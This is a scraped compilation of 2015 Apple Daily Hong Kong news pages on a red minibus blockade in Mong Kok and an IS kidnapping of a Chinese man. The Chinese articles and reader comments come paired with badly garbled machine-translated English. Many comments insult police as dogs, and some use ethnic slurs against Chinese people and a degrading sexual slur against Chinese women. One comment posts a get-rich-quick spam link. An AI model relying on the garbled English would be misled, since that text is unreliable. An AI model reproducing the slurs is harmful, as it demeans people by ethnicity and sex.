hours ago;May Leung] - I want to hear the explanation under the promise sir!2 · 3 hours ago;(2 replies); two hours ago;Pak Lam Kong] - eradicate alien thing ...1 · 2 hours ago;Calvin Yuk] - one of us, yesterday you help me, today I can help you! Fan!1 · 2 hours ago;Ivan Li] - Black Police #!Hong Kong comes to an end ...1 · 2 hours ago;Amy Wong] - 689 detached thief wolf trick Department released the ugly side of human nature,Drainage into the hands of the police department so black police!2 hours ago;Ding Li] - watch the video to see the street as if left over to buy a minibus, so the Department of * private road,Takes Mongkok day classes are all minibus Gangster shot only, successful recovery, it snakes Youmie way ... # Black POLICE (I added)1 · 2 hours ago;Howard Ma] - to my foreign friends say the Department of Drainage to feel that Hong Kong tourist attractions. ʱ?? ʱ?? Good words colourful. ʱ?? ʱ??2 hours ago;Patrick Mang] - you know!1 · 2 hours ago;Ray Mak] - what-Ye industry has its own friends, their own friends are beneficial, can also anger,This wrap is Hong Kong, yet can only fully, 68 Dove is an outrage!1 · 2 hours ago;Wc Wong] - accounting for Wang with the police when wearing a pants according to family do not give a kick vegetarian monk.Department of true system is not reported according to family only reported ....2 hours ago;ShSean Shiu] -? Two policemen it illegally parked ah and home Zhongwu fast GOD pull people.2 hours ago;(1 reply)Tuss Wu] - Force to the host soon will help to find a number of gangland turf war split Friends !!2. about 1 hour ago 'Yiu Cho Chow] -pictureAbout 1 hour ago;Yiu Cho Chow] - our department "tide together" ....About 1 hour ago;Demonliu Liu] - want the same day, this group of people has always been to maintain law and order both, suddenly chaos hit students play people,If the period of time, people take you miles class state Department of points? Thereafter Youmao drainage law enforcement support violence?If so, that is the day you land contributing drainage system to lynch,The day you hand in the manufacturing of black police, today Wu Cha expanding, rampant no way ... you have been NIE,Was little revenge on you, the Department of the cycle, the Department of retribution, the Department of disgrace, deserve that, should the case!4. about 1 hour ago; edited;Raymond Lai] - because I see minibus attitude, help demonstrators speak out?A Sir attitude has always been this way, they can also tough polite,Yesterday's result, today's results.2. about 1 hour ago;(1 reply)Ben Wong] - Hong Kong Police Force garbage, Executive Zuoqu friends !!1. about 1 hour ago;Pianca Tse] - Well #!About 1 hour ago;Anthony Chow] - Department of Mi good suspect Chalao income twist left the station head money !!2. 59 minutes ago;(1 reply)Bonnie Pong] - selective enforcement, to close regulation ...!4. 45 minutes ago;(1 reply)Piano Chiu] - evil dog POLICE !! #1. 34 minutes ago;Lee reward points] - Black evil Police Department to protect the black community!31 minutes ago;Lee reward points] - execute left poor drainage York! We need the Mainland, Hong Kong City Police!29 minutes ago;Jacob Chan] - in fact live Police crime, and Youmie afraid wow ,, = =.Cock! Do not attempt to listen to the microphone and speak no background ge-based group has a brand Lanzi 😅 # Black POLICE (I added).

 ===

 

 


前晚拍下衝突場面片段的小巴司機指,引發事件是警察態度的問題,而不是抄不抄牌的問題。

【短片】【紅Van佔旺事件揭違泊嚴重  潮聯小巴霸路警無執法】
http://bit.ly/1EQTy6f
【傘運期間 涉事警怒罵酒店職員】
http://bit.ly/1EQTy6k
【警方大細超 紅Van泊街係被迫?】
http://bit.ly/1EQTy6o

Cheung Dickson 、 Mak Chi Cheung 、 Wong Tik Fai 以及其他 4,664 人都說讚。
620個分享.

Hang Jai Alec]- 又要香港人光復 ??? 蘇局長有咩講 ???
4小時前;
牛精良]- 冷眼看螃蟹,看他橫行到幾時?
3 · 4小時前;
Raphael Lai]- 態度?! 無問題喎…至少已經唔會幾個差佬㩒你响地再中到你爆肛, 然後話你反抗所以自己整親,有咩問題呀?佔中嗰時你接受到, 甚至叫好, 但點解家吓接受唔到呀?
3 · 4小時前;
[3則回覆 · 約 1 小時前]

Ho Yan Kwan]- 佔領呢班唔係潮聯喔!!!
4小時前;

Barbie Boone]- 警察=賤賊😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈
1 · 4小時前;

Ken Pang]- 黑警幾廿年都係咁
3小時前;

Conrad Chow]- 選擇性,回去六七十年代,警方無能
5 · 3小時前;

Lima Chan]- 笑左
3小時前;

Ming Wong]- 4條缐霸咕3條線差佬都唔理,無法無天
2 · 3小時前;
[1 則回覆]=
Matthew Harris]- 出國旅遊花錢不手軟!
方法>>http://ppt.cc/279QQhttp://mishao.weebly.com/
脫離苦海好方法!
上班族、學生、家庭主婦看過來!!!!!
自己" 薪水 "自己搶救 辛苦上班無法改變你的生活品質...!
{mishao.weebly.com)
3小時前;

Chan Lok]- 的士小巴出左名冇態度,抵死,
3小時前;

Charmingly Wong]- 仲係九龍城寨時代咩?
3小時前;

Seven Mok]- 狗,此終都係怕主人既~
1 · 3小時前;

王敬義]- 狗警無用!
3小時前;

趙景辰]- 警察打壓人民就叻 黑社會 !? 咪即刻…大佬 唔好意思 sorry sorry 跟著雞咁腳走?!

2 · 3小時前;
Michael Mak]- 出禁制令啦。。
2 · 3小時前;

Chow Sing Sing]- 係689英明帶領下, 警差完全回歸到70年代, 無法無天,
以前都仲會向傳媒交代, 做下戲, 依家擺明唔理, 唔回應!!
9 · 3小時前; 已編輯;

Siu Lok Lam]- 抄你牌,比你屌。你估下邊個有問題??!
3小時前;

Amy Lau]- 潮聯差佬怎敢抄牌呀有民建聯睇埸架,抄牌你傻架!!
4 · 3小時前;

Ben Luk]- 警察冇叉用!
成隻奄春咁!
2 · 3小時前;

Eric Tong]- lCAC?? not working??!
3小時前;
(2則回覆 )· 3小時前;
WH Suen]- 一視同仁先有人服架!
1 · 3小時前;
Kevin H.Y. Lui]- 小巴是紅的, 小巴又沒黃絲帶,
藍色生物唔敢做野,,兼做唔到野!
淨係識得打學生.
1 · 3小時前;  已編輯;

Ricky Wong]- 返左收規華年代。
6 · 3小時前;

Patrick Li]- 阿蛇唔做嘢!
有糧出,有人工加。真好!
4 · 3小時前;

Wing Chan]- 因為牠們是愛國的....奴隸(haha...)
3 · 3小時前;

May Leung]- 我想聽下許sir解釋!
2 · 3小時前;
(2則回覆 );2小時前;
Pak Lam Kong]- 剷除異己嘛...
1 · 2小時前;
Calvin Yuk]- 自己人,昨日你幫我,今日我幫番你@!
1 · 2小時前;

Ivan Li]- 黑警#!
香港玩完...
1 · 2小時前;

Amy Wong]- 賊狼689獨門絕招係釋放人性醜惡的一面,
所以警隊係佢手上變為黑警!
2小時前;

丁力]- 看視頻見到條街好似比小巴買左,所以系·私家路,
當日收佔旺角都系班大佬小巴出手才,成功收回,呀蛇有咩辦法...#黑公安(我加上的)
1 · 2小時前;

Howard Ma]- 對我外國朋友講係佢地覺得香港旅遊景點。。。話好colourful。。。
2小時前;

Patrick Mang]- 你懂的!
1 · 2小時前;

Ray Mak]- 乜嘢行業都有自己友,都益自己友,可怒也,
這裹是香港,還未可以隻手遮天,68鳩太可惡了!!
1 · 2小時前;

Wc Wong]- 佔旺時与警察穿一條褲.依家給人打完齋不要和尚。
真係不是不報係依家才報....
2小時前;

ShSean Shiu]- 個惡警呢?違泊啊而家 仲唔快啲拉人。
2小時前;
(1 則回覆)
Tuss Wu]- 就快港警會幫黑社會搶地盤劈友找數!!
2 · 約 1 小時前'
Yiu Cho Chow]-picture
約 1 小時前;

Yiu Cho Chow]- 我係“潮聯”....
約 1 小時前;

Demonliu Liu]- 想當日,這班一向維持法紀既人,突然亂性打學生打市民,
果段時間,你哩班人取態係點? 其後有冇支持佢地暴力執法?
如有,即係當日你地助長佢地濫用私刑,
當日你携手制造黑警 ,今日烏察坐大,橫行無道…你被人乜乜,
被人點點對你們報復,係循環,係報應,係自取其辱,活該如此,應當如此!
4 · 約 1 小時前;已編輯;

Raymond Lai]- 吾見小巴因為態度問題,幫示威者出聲?
阿Sir 態度一向是這樣,他們可以有禮貌也可以強硬,
昨日的因,今日的果。
2 · 約 1 小時前;
(1 則回覆)
Ben Wong]- 香港垃圾警隊,執左佢啦!!
1 · 約 1 小時前;

Pianca Tse]- 哼 #!
約 1 小時前;

Anthony Chow]- 好懷疑差佬係咪收撚左站頭錢!!
2 · 59分鐘前;
(1 則回覆)
Bonnie Pong]- 選擇性執法,收規...!
4 · 45分鐘前;
(1 則回覆)
Piano Chiu]- 無惡不作狗公安!!#
1 · 34分鐘前;
李賞點]- 黑警係保護黑社團的!
31分鐘前;
李賞點]- 執左差綰佢!香港吾須要內地城警!
29分鐘前;
Jacob Chan]- 其實對住警察犯罪,又有咩好怕wow,,=.=
屌!講唔好聽咪又系一班無背景ge有牌爛仔😅 #黑公安(我加上的)


 =====
 http://hk.apple.nextmedia.com/news/first/20150910/19289632


Red Van paralysis night Mongkok Weijingtiaoji


 WASHINGTON Shanghai Street, Mong Kok, large-scale occupation of the incident last night! Police Langham for a billing control illegal parking and minibus drivers, there are drivers who reported being beaten by police officers, police said the minibus was injured, the results lead to a large number of minibuses dissatisfied with the industry, namely field strikes and The dozens of red van blocked the junction of Argyle Street and Shanghai Street, a section of Shanghai Street "occupation", there have been more than 100 people was out of the road, the situation is confusing. Event dragged on for over three hours led to a number of major roads in Mong Kok serious traffic jam, to start gradually returning to normal this morning. A minibus driver and a police officer reported injured sent to hospital for treatment. Reporter: Wen Li Jiaju Literature.

 

■ more red minibuses blocking seillans Langham Place outside Shanghai Street, Mong Kok, causing large traffic jam. Temperature literature Photo.



Shanghai Street, Mong Kok site Langham head off the Red Roof minibus station, minibuses Tsuen Wan and Kwai Tsing area, this time caused by the storm strikes minibus copy card is reported that the line Tsuen Wan Line, it is understood that the station head often minibus stopped at the yellow line, even a minibus row position to turn the police on several occasions summonsed violation minibus drivers have a driver license to be copied earlier complained.

Last night nearly 9:00, more vehicles on Red Roof minibuses parked in Langham station head, a minibus driver to get off the train to buy lunch, return copy cards found by the police, that intends to drive the car into the station head suspect tangent was a senior police officer that he stopped to summonsed him for dangerous driving, saying his right hand was hit by the minibus driver dissatisfaction alight and police theory, the two sides dispute, chaos drivers reported being beaten police officers.
 

It was out of the road causes confusion

Witnesses said the driver was beaten to witness, but I want to avoid being hit after the driver returns the minibus, but officers from the loudly condemn the presence of other minibus drivers dissatisfied with police theory, some police officers to small bus drivers, said: "Han Mi want to point you do not attempt to block the police from performing their duties ah??" The two sides renewed disputes with booing driver said to strikes, drove to the roadside parked, followed by another minibus driver Add to that more than 30 minibuses to Shanghai Street four lanes occupy three lines, the driver alighting uproar.

Large number of police reinforcements arrived at the scene, the atmosphere tense standoff, police cordoned section of Shanghai Street, Argyle Street and Shanghai Street, Mong Kok Road can not turn into, long queues of vehicles. Police officers were reported injured driver was referential assaulting, sent to hospital for treatment. To the evening, police summoned someone intends minibus towed trailer, a large number of drivers dissatisfied booing again, and shouted: "! Escalation" It was out of Argyle cause confusion. To 11 pm, a group of 10 people of "dove Woo Group" scene solidarity tense situation further.

In addition, the incident took minibus drivers will clip and put online, fragments seen at a number of minibus drivers working with two police officers in a dispute Langham minibus station with minibus drivers lift machine shooting, a police who said: "You do not attempt to re-live my shadow, shadow you would hinder me from performing their duties." minibus driver retorted: "? I 𠵱 pedigree microphone Movies Well it was with" police response: "Well ...... I also love department silhouette phase, you GOD flash my whole live. "


Then he was shot being taken to tighten the lens minibus drivers. Minibus driver immediately booing, the chaotic situation, there are minibus driver called police: "! Do not attempt to hand Yu Yu feet," adding: "Day after day copy (license), I agree Link Link copy copy on the line you better ...... Zo seal a minibus station, do not attempt to give me a man with! "dispute lasted about three minutes, after they red van accounted prosperous event.



 401 comments.

 Li Tommy] -Ban Pujie accounted for help when Link Jiuhaola IKEA arrived Q You Die miserable, copied Q brand on Ngam La drainage DieReply / Share5.1 day agoChan HarryThe driver was beaten chaos police reported.=========="Faculty of Law of justice" tour bus drivers convicted for assaulting a police officer Detroit Metal CityPolice officers involved in the Tsim Sha Tsui copy cards slapped travel ban tourist bus drivers to testify================================================Real board[[[[[[[[[[[[Magistrate when ruling means that the defendant Li Weiming (Saba years) claimed his arm black with blood, but the injury does not match with the medical reports, make it difficult to accept the court his version; contrary to any police Members of the prosecution witness statements credible, it ruled that the crime of the accused into. ʱ??https://youtu.be/StqNHGQ5vKo2011-04-21Tribunal: Tour bus drivers convicted for assaulting a police officer Detroit Metal CityTourist bus drivers in July last year in Hankou Road near Middle Road, Tsim Sha Tsui junction, due to copy licensing dispute with the police, the driver accused of foul language and abusive police divide, but also to the driving license by the police on the ramp to the left scraping Eye arrested. After hearing the case, in Kowloon City Magistrates Court yesterday ruled that the crime of assaulting a driver, he will be in custody until May 5 to upon request background reports and police reports of injuries start sentenced.When the magistrate ruling means that the defendant Li Weiming (Saba years) claimed his arm black with blood, but the injury does not match with the medical reports, make it difficult to accept his version of the court; the prosecution witness statements contrary to any credible police officers, it ruled that the defendant convicted. Also refers to the magistrate sentenced the defendant to consider the extent of assaulting a police officer, police officer scratched his left eye with a driver's license, so that other vision was impaired, although no permanent injuries but the court decided to sentence the beginning of search reports.The defendant and the defense plea dating two decades educating children of his girlfriend, he is a tourist bus drivers in the past, but in this case evidence was withheld from license and unemployment, now rely on help from friends to survive. Read to the accused in three degrees, low repetition opportunity, hope is eligible for a lenient sentence. Case Number:KCCC 5683/2010=====Fierce police: you play with the big canalBlowing chicken around Ocean Park minibus driver fined one thousand fiveMarch 24, 2012Red minibus driver claimed in time for the Ocean Park visitors leave the rush hour to drive to pick up,But was intercepted traffic police minibus structure means there is a problem, to a trailer inspection, huff called "blown the whistle"Directed "GOD dead 差佬 sun all play Ye ...... called" enterprise management generous car "into come out and walk with me surrounded Ocean Park!"Seven experts heard the news rushed, Parking blocking passage into the marine park nearly 20 minutes, resulting in long queues of vehicles.Magistrate yesterday denounced the blow chicken is the initiator driver fined 1,500 yuan.https://www.youtube.com/watch?v=RFfVZ4bh2P4=====William Hinderson] -Mi injunction was Hello! Minibus most experienced guy 㗎 le!- After the ban police minibus copy card;- Ban all traffic police; patrol appeared in minibus;- Ban the judge sentenced offenders minibus guy guilty.Reply / Reply Share -224 hours beforeStanley Choy] -Black police ban buried copied brand good Nuisance it!Reply Share3/121 hours beforeWhatsmyfriends ChanHan, Mi Fan twelve minibus buy pants brand anti-La
 
Reply / Share1 day agoSusanboy HkMinibus guy who left to live Wen Shi, send four guys minibus word ungrateful!Reply / Share2.1 day agoKenneth NgDepartment not agree with what-decay D 689 pour pour Wudian wild anti-Taiwan, according to house 689 people crazy play Useful copy card, you agree Why last year accounted for Wang Youwu copy, no Lala, the whole da scar.Stanley Choy] -Pakistan Locust Hall Meeting with the poor dog went black policeBlack police because they have to serve the Air pressureMomentum Neweigeji Wushao too generousSo bury class group of dogs I left fifty cents to help the party momentum ?? =. =Louiee Chu] -Pull D yellow silk on the fast hard accurate, minibus guy on Jiaoruan contempt pull 9 D minibus guy, tell canal to D exhaust assaulting acridine Well!Wins Wong] -Department really died laughing twist, a party often deceive fifty cents,Daily Internet gossip incoherent, then blue corpse mouth Weiguang Zheng receive stability maintenance fee.Indeed shameless !!Niexu junk fifty cents. Demon.Reply / Share12.

 
■ more red minibuses blocking seillans Langham Place outside Shanghai Street, Mong Kok, causing large traffic jam. Temperature literature Photo.

 Chase real thing burst size city that like Apple [site] FB!
===
 http://hk.apple.nextmedia.com/news/first/20150910/19289632


紅Van癱瘓黑夜旺角 圍警挑機



【本報訊】旺角上海街昨晚又發生大規模佔領事件!警方在朗豪坊對開票控一名違例泊車的小巴司機,有司機報稱遭警員毆打,警員則表示被小巴撞傷,結果引發大 批小巴同業不滿,即場罷駛並將數十部紅van堵塞在亞皆老街與上海街交界,將一段上海街「佔領」,其間有逾百人一度走出馬路,情況混亂。事件擾攘逾3小時 導致旺角多條主要幹道嚴重塞車,至今日凌晨始逐步恢復正常。一名小巴司機及一名警員報稱受傷被送院治理。記者:溫文學 黎家駒.
現場為旺角上海街朗豪坊對開紅頂小巴站頭,小巴行走荃灣及葵青區一帶,而引發今次抄牌罷駛風波的小巴據悉行荃灣線,據了解該站頭常有小巴停在黃線,甚至有 小巴排至轉彎位,警方曾多次票控違例小巴司機,有司機對被抄牌早有怨言。昨晚近9時,多輛紅頂小巴泊在朗豪坊站頭,一名小巴司機落車買飯,返回發 現被警員抄牌,即上車擬將車駛入站頭時疑切線,被一名高級警員截停指他危險駕駛要票控他,並稱右手遭小巴撞到,司機不滿落車與警員理論,雙方爭執,混亂中 司機報稱被警員毆打。

有人衝出馬路引起混亂


有目擊者稱親睹司機被打,而司機被打後欲避開返回小巴,惟警員從後大聲指罵,在場其他小巴司機不滿,與警員理論,有警員向小巴司機稱:「咁你哋想點呀?唔 好阻住警員執行職務?」雙方再起爭拗,有司機起哄稱要罷駛,將車駛至路邊停泊,其後陸續有小巴司機加入,逾30輛小巴將上海街四條行車線的三條線佔據,司 機落車鼓譟。
大批警員到場增援,雙方對峙氣氛緊張,警方封鎖一段上海街,亞皆老街及旺角道不能轉入上海街,車輛大排長龍。報稱遭警員打傷的司機被 指涉襲警,需送院治療。至晚上,警員召來拖車擬將涉事小巴拖走,大批司機不滿又再起哄,並大叫:「行動升級!」有人衝出亞皆老街引起混亂。至晚上11時 許,一批10多人的「鳩嗚團」到場聲援,情況進一步緊張。
另外,有小巴司機將事件起因拍下短片並放上網,片段可見當時數名小巴司機正與兩名警員在 朗豪坊小巴站內爭執,有小巴司機舉機拍攝,一名警員表示:「你唔好再影住我,你影會阻礙我執行職務。」小巴司機反駁:「我𠵱家係咪唔影得相呀?」警員回 應:「係……我唔鍾意人影相,你啲閃光燈整住我。」然後便有人出手將鏡頭擰向正在拍攝的小巴司機。小巴司機立即起哄,情況混亂,有小巴司機叫警員:「唔好 郁手郁腳!」並稱:「日日都抄(牌),唔係咁抄就係咁抄……你不如封咗個小巴站,唔好畀人用!」爭執持續約3分鐘,之後便發生紅van佔旺事件。

 ===

 401個評論.
Li Tommy]-
呢班仆街,佔中時咁幫忙就好啦,宜家抵Q你哋折墮,抄Q佢哋牌就啱喇
回覆/分享
5.
1天前
Chan Harry
混亂中司機報稱被警員毆打。

==========

「法律係公正」旅巴司機爆粗襲警罪成

尖沙咀警員抄牌涉掌摑旅遊巴司機禁遊客做證
================================================
真實板

[[[[[[[[[[[[裁判官裁決時指,被告李偉明(卅八歲)聲稱自己手臂有瘀黑,但傷勢與醫療報告不符,令法庭難以接納他的版本;相反任警員的控方證人口供可信,故裁定被告罪成。]]]]]]]]]]]]]]]

https://youtu.be/StqNHGQ5vKo

2011-04-21
法庭:旅巴司機爆粗襲警罪成

旅遊巴司機去年七月中在尖沙咀漢口道近中間道交界,因抄牌事宜與警員爭執,司機被指除以粗口辱罵警員外,更以駕駛執照由下到上斜刮向警員左眼被捕。案件審訊後,裁判官昨於九龍城法院裁定司機襲警罪成,將他收押至五月五日,以索閱其背景報告和警員的傷勢報告始判刑。

裁判官裁決時指,被告李偉明(卅八歲)聲稱自己手臂有瘀黑,但傷勢與醫療報告不符,令法庭難以接納他的版本;相反任警員的控方證人口供可信,故裁定被告罪成。裁判官又指判刑需要考慮被告襲警的程度,他用駕駛執照刮傷警員左眼,令對方視力一度受損,雖沒有永久傷勢但法庭決定先索報告始判刑。

辯方求情指被告與拍拖十年女友育兩子女,他過往是旅遊巴司機,但因本案被扣起執照作證物而失業,現依靠朋友接濟維生。被告唸至中三程度,重犯機會低,望獲輕判。 案件編號:

KCCC 5683/2010

=====
兇交警:同你玩大佢
吹雞圍海洋公園 小巴司機罰千五
2012年03月24日

紅色小巴司機聲稱趕在海洋公園遊客離開高峯時間駕車往接客,
卻遭交通警截查指小巴結構有問題,要拖車送檢,一怒之下打電話「吹雞」,
直指「啲死差佬玩嘢......叫晒所有『企理』嘅車入嚟,同我圍住海洋公園!」
七名行家聞訊趕至,泊車阻塞進入海洋公園通道近 20分鐘,造成車龍。
裁判官昨斥吹雞司機是始作俑者,判罰款 1,500元。
https://www.youtube.com/watch?v=RFfVZ4bh2P4

=====
William Hinderson]-
申請禁制令咪得囉!小巴佬最有經驗㗎嘞!
--  禁制警方以後抄小巴牌;
--  禁制所有交通警;巡警在小巴路綫出現;
--  禁制法官判小巴佬違例有罪。
回覆/分享-2個回覆

24小時之前
Stanley Choy]-
禁制埋黑警抄牌好冇呀!
回覆分享
3/1
21小時之前
Whatsmyfriends Chan
咁,咪要買番一两個小巴牌防下身囉
 回覆/分享

1天前
Susanboy Hk
小巴佬左能住人搵食,送小巴佬4個字過橋抽板!
回覆/分享
2.

1天前
Kenneth Ng
係唔係同689傾D乜衰野傾唔掂反枱,依家689揾人狂玩抄牌,唔係點解上年佔旺又唔抄,無啦啦,整噠疤。


Stanley Choy]-
蝗巴狗去差館同黑警開會
因要俾壓力黑警睇
氣勢呢味嘢係唔少得嘅
所以班埋群五毛左狗奴才黨去助聲勢?? =.=

Louiee Chu]-
拉D黄絲就快狠準、小巴佬就脚軟、拉9哂D小巴佬、告佢地D廢氣襲警吖嘛!

Wins Wong]-
真係笑撚死,一隻經常欺騙黨的五毛,
每日上網說三道四語無倫次,然後藍屍口中的偉光正領取維穩費。
可謂無恥之極!!
垃圾级的五毛孽畜。妖。
回覆/分享
12.

追實城中突發大小事,即 like 蘋果【現場】FB!
 =====
 http://hk.apple.nextmedia.com/realtime/news/20150909/54186404

 More than 20 red minibus drivers who were dissatisfied with the police copy cards, starting at 8 pm Langham Place, Mongkok blocked off section of Shanghai Street, and two minibuses parked at Shanghai Street, Argyle Street intersection, and the police once Confrontation over three hours. Site sources, there is dissatisfaction with the police have been protesting drivers 'release' in Tung Choi Street occupied by three or four lanes linking the tide minibus, but they choose to "cut"; also driver complaints were beaten by police.
 


周咏雯 photo.
Some people arrived at the scene armed with yellow umbrella, and pull the "I want true universal suffrage" banners of Solidarity, he said that police violence against drivers, also asked the police to stop the influx of linking red minibus copy cards should be non-discriminatory law enforcement.




 ===
 http://hk.apple.nextmedia.com/realtime/news/20150909/54186404

 20多個紅色小巴司機因不滿警方抄牌,晚上8時許起堵塞旺角朗豪坊對開的一段上海街,並將兩部小巴停泊於上海街亞皆老街的十字路口,與警方一度對峙逾3小 時。現場消息指,有抗議的司機不滿警方一直「放生」在通菜街佔據三、四條行車線的潮聯小巴,反而選擇向他們「開刀」;亦有司機投訴被警方毆打。

 周咏雯 photo.
有市民到場手持黃傘,及拉起「我要真普選」橫額聲援,稱警方暴力對待司機,同時要求警方到潮聯紅色小巴站抄牌,應一視同仁執法。


 =====
 http://hk.apple.nextmedia.com/realtime/international/20150910/54186792


[IS] China and Norway rebellion men kidnapped ransom

 
 89 comments.18 hours agoRoy Chan] -This is stupid, the whole world know the Chinese people Well worth [minimum CPC think], point to sell?Reply / Share418 hours agoPeter Chan] -In the eyes of most of the Communist Party of extremist organizations, people's lives are worthless beast.Reply / Share421 hours beforeGod Bless Zhan] -
 
Finally have the opportunity to show the strength of it than China!If China really tie fight l S, whether successful or not, I will talk after the Department of the Chinese people themselves (haha ...)Reply / Share624 hours beforeKeyman Chan] -I S catch Fan own countrymen?!Reply / Share6/121 hours beforeJeremy Mui] -hehehehehe, I agree Bo, and other military powers JiuJia tight, but also to show the power of your microphone Link stingy it! China-pig can frighting ????Reply / Share221 hours beforeJeremy Mui] -Link heavenly rich, IS More Useful canal D strong hand nationals buried it, like pieces are big qi Cheung Link Useful rich guy hands down slightly!Reply / Share21 day agoLam AL] -You are a big country, it views of the Department, Department of microphone net twist population have to die? IS department hands down, there are parts of the dead!Reply / Share4/11 day agoWan Kc] -Off Hong Kong Mieshi, you have to Cock Cock Hong Kong with the Chinese government on the matter, the power line to the canal, so if you can really tie On99 On99 ....Reply / Share9/021 hours beforeJeremy Mui] -You take the lead before you, know you certainly dying Pat generous!Reply / Share4/024 hours beforeKeyman Chan] -I S catch Fan Wai own countrymen!Reply / Share .322 hours beforeapple Zhizhi] -There Shina Han twist more new weapons, money and great, and Zhongyi boasted, sent troops to fight is to save Hello, you agree Nuisance guts scare Wow .. Or pretend weapon system d dog -Reply / Share .421 hours beforeJeremy Mui] -Link Love CPC tin D people, of course, a massive power anymore Nuisance worried! >> Zoonotic lying fine! Haha ... (I added)Reply / Share .11 day agoLanguagecode Simon] -Contributing to terrorism ... hohoReply / Sharetwenty one24 hours beforeKeyman Chan] -I S branch that kinky people of the Republic = (good! I added ^^)Reply / Share .21 day agoLinghu Chong] -Pay ransom to save the hostages left first, after the death of drying out the missile bombing twist classes IS, drainage and other places Nuisance money to enjoy life, to work Pujie lesson served !! (good! I added ^^ haha ​​...)Reply / Share8/01 day agoLee I] -A Chinese hostage eyes good bad weirdReply / Share3/71 day agoKi Tong] -Even IS bandits also bow! Haha!Reply / share.twenty one1 day agojimmy lim kongkuen] -Well this time to save save it?Reply / Share .21 day agoKwong Sang Tse] -The last two months, the Communist Party a relative latecomer to spend tens of millions of Zo,Foreclosure Zo off a bicycle, and they come out and walk a home?Seo Han Chinese population more than redeemed more than a few.Zhongyou, classes at any time and Is dead Pujie pull the cat tail, play was kidnapped.This time developed Hello!Reply / Share11/024 hours beforeKeyman Chan] -Sophisticated analysis, praise!Reply / Share3/01 day agoSky KitChina sent troops to play seven drainage friends, talk with Han twist more are untwisted,Reply / Share9/024 hours beforeKeyman Chan] -CPC fight against each other on ten smart!Reply / Share2/01 day agoKa Wong] -Bottom deadReply / Share3/51 day agoSs Wq] -In fact, the last to be rescued abducted Chinese people have come back.Domestic media is glossyApple Daily is reporting only bad news is not good newsHahahaha....Reply / Share4/31 day agoCharles Woo] -People's Liberation Army do? Missile it? Go to the left you?I agree, then you can go onto US baa?Luo left the department should come out and walk the exhibition, too busy to call Putin come out and walk Dramas ... !!Reply / Share13/01 day agoSky Kit] -No warheads, China fake field more, the letter Well before, like North KoreaReply / Share5/01 day agoSamsan Ng] -I have not tried the continental system, when the Sino-Japanese war, Han Mi Deng Shichang dead Hello!Reply / Share3/01 day agoMin Chen] -Celestial party state if they have more than a paper tiger team of US imperialism seals also interested forces,
 
Why not to save people, does is "Chit troops.."Reply / Share13/01 day agoRoy Chan] -Catch Fan canal d holy warriors, I asked him to want to be ... Well ??Reply / Share7/01 day agoTimothy Wun] -Urban violence is not saved before, or you Zhongyou spare cash redemption.According to family, you ISIS Wubi money I Communist country, driving purpose microphone push Fan individual to serve me, Sai my rice. (Well ..! I added hahahaha ...)Reply / Share6/01 day agoSheamus Leung] -Taiwanese Hong Kong と と で Chinaman Chinese people moo shi January u? Ma ta ku っ と low species u thinkingReply / Share1/111 day agoSheamus Leung] -It IS the best the Empire of Japan jointly capture the land of China ,, u everywhere to Chinese women raped Chinese women line the world's lowest female biological .. cheap glass slide seeking lower marks ... noble ... but Japanese Japanese inserted in conjunction with the Department of Well Animals do Hello!Reply / Share1/1322 hours before_ Mami Tomoe] -Guiqiu translator siteReply / Share .120 hours beforeYi Xiong] -Drainage surnamed Liang, Department of baa people you talk20 hours beforeYi Xiong] -The Japanese did not you Terrier Nuisance polite! Zhongyou your surname Chinese surname Wai!1 day agoChuimao broken hair] -Hey come out and walk generous continental twist, ISIS it once eclipse rice friends, this shop will truly "catch the worm" friends ...Reply / Share8/11 day agoYellow River] -
 
"This shop really line" courting "friends"; describe was wonderful!Reply / Share3/01 day agoJustin Fong] -And then if we just sperm Nuisance military servicemen and family have left have become hostages of RMB Point SolutionsReply / Share9/01 day agoLing Fun] -Chinaman a GOD will not even poor!Reply / Sharetwenty one1 day agoJarrod Xiao] -Do not know you know the twist at the end point of a name Chinaman come out and walk? ʱ?? There are a few insults? Well-known twist and side D-known race called Chinaman? ʱ?? check your last name again asshole! You are one of them !! Google the word first before you comment you piece of shit!Reply / Share5/11 day agoProud Chen] -Really proud, never IS shelf Russian nationals are Wugan Bang!Reply / Share7/01 day agoWong Ronald] -In fact, Russia is good twist poor ..! Haha ...


 ===
 http://hk.apple.nextmedia.com/realtime/international/20150910/54186792


【IS作亂】中國與挪威男子 遭綁架索贖

 
 89個評論.

19小時之前
Roy Chan]-
is這次太笨,全世界都知中国人唔值錢[最少中共覺得],點賣?
回覆/分享
4

19小時之前
Peter Chan]-
在最極端組織的共產黨眼中,畜牲人民生命是沒有價值。
回覆/分享
4

21小時之前
天佑 詹]-
 终於有機會 比中國顯示實力啦!

如果中國真係打 l S,不論成功與否,我以後都會話自己系中國人(haha...)
回覆/分享
6

24小時之前
Keyman Chan]-
I S 捉番自己同胞?!
回覆/分享
6/1

21小時之前
Jeremy Mui]-
hehehehehe, 唔係噃,等紧强國軍救駕,又可展示威力,你咪咁小氣啦!China-pig can frighting????
回覆/分享
2

21小時之前
Jeremy Mui]-
天朝咁富有,IS 更揾佢D強國民埋手啦,好似條大柒張子強咁都揾有錢佬落手咯!
回覆/分享
2

1天前
Lam AL]-
你個大祖國,係呢次度,咪淨撚係得把死人口?落係 IS 手上,死就有份!
回覆/分享
4/1

1天前
Wan Kc]-
關香港人咩事,你要屌就屌香港同中國政府啦,權力係佢地到,所以話你On99就真係On99....
回覆/分享
9/0

21小時之前
Jeremy Mui]-
你身先士卒先啦,知你肯定死而後巳嘅!
回覆/分享
4/0

24小時之前
Keyman Chan]-
I S 捉番自己同胞喎!
回覆/分享.3

22小時之前
apple 芝芝]-
支那有咁撚多新武器 , 錢又多 , 又鍾意晒命 , 出兵去打is救人囉 , 唔係冇胆吓嘩 .. 抑或係d武器裝假狗 --
回覆/分享.4

21小時之前
Jeremy Mui]-
中共咁愛錫D子民,當然強國出重兵啦,冇擔心過!>>畜共大話精!haha...(我加上的)
回覆/分享.1

1天前
Languagecode Simon]-
助長恐怖主義...hoho
回覆/分享
2/1

24小時之前
Keyman Chan]-
I S 支 那 淫民共和國 = (good! i added^^)
回覆/分享.2

1天前
沖 令狐]-
交贖金救左人質先,之後出動導彈炸撚死晒班IS,等佢地有錢冇命享,要教訓下班仆街先得!!   (good! i added^^haha...)
回覆/分享
8/0

1天前
李我]-
個中國人質隻眼好衰好怪
回覆/分享
3/7

1天前
Ki Tong]-
連IS共匪也低頭!哈哈!
回覆/分享.
2/1

1天前
jimmy lim kongkuen]-
今次救唔救呢?
回覆/分享.2

